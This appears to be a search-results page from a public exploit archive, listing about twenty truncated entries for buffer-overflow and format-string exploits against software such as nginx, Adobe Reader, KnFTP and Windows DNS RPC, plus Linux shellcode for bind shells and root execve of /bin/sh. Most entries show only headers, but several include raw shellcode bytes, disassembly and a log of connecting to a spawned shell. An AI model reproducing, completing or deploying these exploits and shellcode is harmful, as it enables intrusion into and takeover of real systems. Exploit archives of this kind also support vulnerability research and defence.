7260 matches found
OTSTurntables 1.00.048 - (m3u/ofl) Local BOF Exploit (SEH)
No description provided by source. Exploit Title: OTSTurntables 1.00.028 m3u/ofl Local BOF Exploit SEH Date: 11/24/2010 Author: 0v3r Software Link: http://www.otsturntables.com/download-otsturntables-free/ Version: 1.00.048 Tested on: Windows XP SP3 EN CVE: N/A !/usr/bin/python import sys win32bi...
htpasswd Apache 1.3.31 - Local Exploit
No description provided by source. !/usr/bin/perl Proof Of Concept exploit for htpasswd of Apache. Read the advisory for more information. - Luiz Fernando Camargo - foxtrotatflowsecurity.org $shellcode = \x31\xdb\x6a\x17\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68...
Ecartis 1.0 .0,0.129 a Listar Multiple Local Buffer Overflow Vulnerabilities (2)
No description provided by source. source: http://www.securityfocus.com/bid/4271/info Ecartis is the new name for the Listar software product. Listar is a mailing list management package for Linux, BSD, and other Unix like operating systems. Multiple local buffer overflow conditions have been...
KnFTP Server Buffer Overflow Exploit
No description provided by source. !/usr/bin/python tested on windows xp sp3 overwrites EIP seh is overwritten with larger payloads knftpd.exe is the only non safeseh module import sys,socket print \n===================== print KnFTP Buffer Overflow print Written by Blake print...
97 bytes Linux x86 bind shell port 64533
No description provided by source. include stdio.h include string.h / 1 1 0 I'm Magnefikko member from Inj3ct0r Team & Promhyl Studies Team 1 1 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 by Magnefikko 05.07.2010 [email protected] Promhyl Studies ::...
Linux x86 netcat bindshell port 8080 - 75 bytes
No description provided by source. / 08048060 start: 8048060: eb 2a jmp 804808c GotoCall 08048062 shellcode: 8048062: 5e pop %esi 8048063: 31 c0 xor %eax,%eax 8048065: 88 46 07 mov %al,0x7%esi 8048068: 88 46 0f mov %al,0xf%esi 804806b: 88 46 19 mov %al,0x19%esi 804806e: 89 76 1a mov %esi,0x1a%esi...
Adobe Reader PDF LibTiff Integer Overflow Code Execution
No description provided by source. doc=''' Title: Adobe PDF LibTiff Integer Overflow Code Execution. Product: Adobe Acrobat Reader Version: =8.3.0, =9.3.0 CVE: 2010-0188 Author: villy villys777 at gmail.com Site: http://bugix-security.blogspot.com/ Tested : successfully tested on Adobe Reader...
Sync Breeze Server 2.2.30 - Remote Buffer Overflow Exploit
No description provided by source. !/usr/bin/python Exploit Title: Sync Breeze Server v2.2.30 Remote BOF Exploit Date: 10/10/2010 Author: Xsploited Security aka xsploitedsec URL: http://www.x-sploited.com/ Contact: xsploitedsecurity at x-sploited.com Software Link:...
Mac OS X <= 10.4.6 (launchd) Local Format String Exploit (ppc)
No description provided by source. !/usr/bin/perl http://www.digitalmunition.com/FailureToLaunch-ppc.pl Code by Kevin Finisterre kflistsatdigitalmunitiondotcom Much appreciation goes to John H for all kindsa random shit like exploiting Veritas and other random things in the past core... where the...
Microsoft Windows DNS RPC - Remote Buffer Overflow Exploit (port 445) (2)
No description provided by source. Exploit v2 features: - Target Remote port 445 by default but requires auth - Manual target for dynamic tcp port without auth - Automatic search for dynamic dns rpc port - Local and remote OS fingerprinting auto target - Windows 2000 server and Windows 2003 serve...
PHP <= 5.2.3 (php_win32sti) Local Buffer Overflow Exploit
No description provided by source. ?php / Inphex 317 Bytes , Windows Command Shell Bind TCP Inline , Architecture x86 , Windows TinyXP - vm. GET /script.php HTTP/1.1\n telnet 192.168.2.32 4444 Microsoft Windows XP Version 5.1.2600 C Copyright 1985-2001 Microsoft Corp. C:\apache 7ffdf020 7c911005...
SHOUTcast <= 1.9.4 File Request Format String Exploit (Leaked)
No description provided by source. / Shoutcast = 1.9.4 exploit by crash-x Tries to upload the shellcode to a fixed address and execute it. This exploit was not written by Simon 'Zodiac' Moser segfault.ch. / include stdio.h include stdlib.h include stdarg.h include string.h include sys/types.h...
AnvSoft Any Video Converter 4.3.6 Stack Overflow Exploit
No description provided by source. !/usr/bin/python Exploit Title: AnvSoft Any Video Converter 4.3.6 Stack Overflow Author: cikumel @mhxx and y0k @riy0wid from @spentera research Website: http://www.spentera.com Platform: Windows Tested on: Windows XP SP3 Based on POC by Vulnerability-Lab...
aSc Timetables 2013 - Stack Buffer Overflow Vulnerability
No description provided by source. !/usr/bin/python Title : ASC Timetables 2013 - Stack Buffer Overflow Vulnerability Researcher : Souhail Hammou Dark-Puzzle Research Team : http://itsecurity.ma Facebook : http://www.facebook.com/dark.puzzle.sec Date : 22/06/2013 Download Website :...
IWConfig Local ARGV Command Line Buffer Overflow Vulnerability (1)
No description provided by source. source: http://www.securityfocus.com/bid/8901/info A problem has been identified in the iwconfig program when handling strings on the commandline. Because of this, a local attacker may be able to gain elevated privileges. Exploit: / PSTiwconfig /sbin/iwconfig...
nginx 0.6.38 - Heap Corruption Exploit
No description provided by source. !/usr/bin/env python Exploit Title: nginx heap corruption Date: 08/26/2010 Author: aaron conole [email protected] Software Link: http://nginx.org/download/nginx-0.6.38.tar.gz Version: = 0.6.38, = 0.7.61 Tested on: BT4R1 running nginx 0.6.38 locally CVE: 2009-26...
52 byte Linux MIPS execve
No description provided by source. include stdio.h / entropy at phiral.net 52 byte linux mips shellcode oh werd [email protected] /encode/1/2 cat s.s .section .text .globl start .set noreorder start: li $a2, 0x666 p: bltzal $a2, p slti $a2, $zero, -1 addu $sp, $sp, -32 addu $a0, $ra, 4097 addu...
MP3 Studio 1.0 - (.mpf) Local BOF Exploit (SEH)
No description provided by source. !/usr/bin/perl MP3 Studio v1.0 mpf File Local BOF Exploit SEH Exploited by: Koshi Download: http://www.software112.com/products/mp3-millennium+download.html Based on PoC/findings by HACK4LOVE http://milw0rm.com/exploits/9277 Tested on WinXP SP3 I've used address...
62 bytes setreuid(0,0) execve("/bin/sh",NULL,NULL) XOR Encoded Linux Shellcode
No description provided by source. / Author : gunslinger yudha.gunslingeratgmail.com Web : http://devilzc0de.org blog : http://gunslingerc0de.wordpress.com tested on : linux debian special thanks to : r0073r inj3ct0r.com, d3hydr8 darkc0de.com, ty miller projectshellcode.com, jonathan...
linux/x86 execve("/bin/sh", ["/bin/sh", NULL]) 23 bytes
No description provided by source. / linux-x86-binshv2.c - 23 bytes Copyright c 2006 Gotfault Security [email protected] Linux/x86 execve/bin/sh, /bin/sh, NULL / char shellcode = \x6a\x0b // push $0xb \x58 // pop %eax \x99 // cltd \x52 // push %edx \x68\x2f\x2f\x73\x68 // push $0x68732f2f...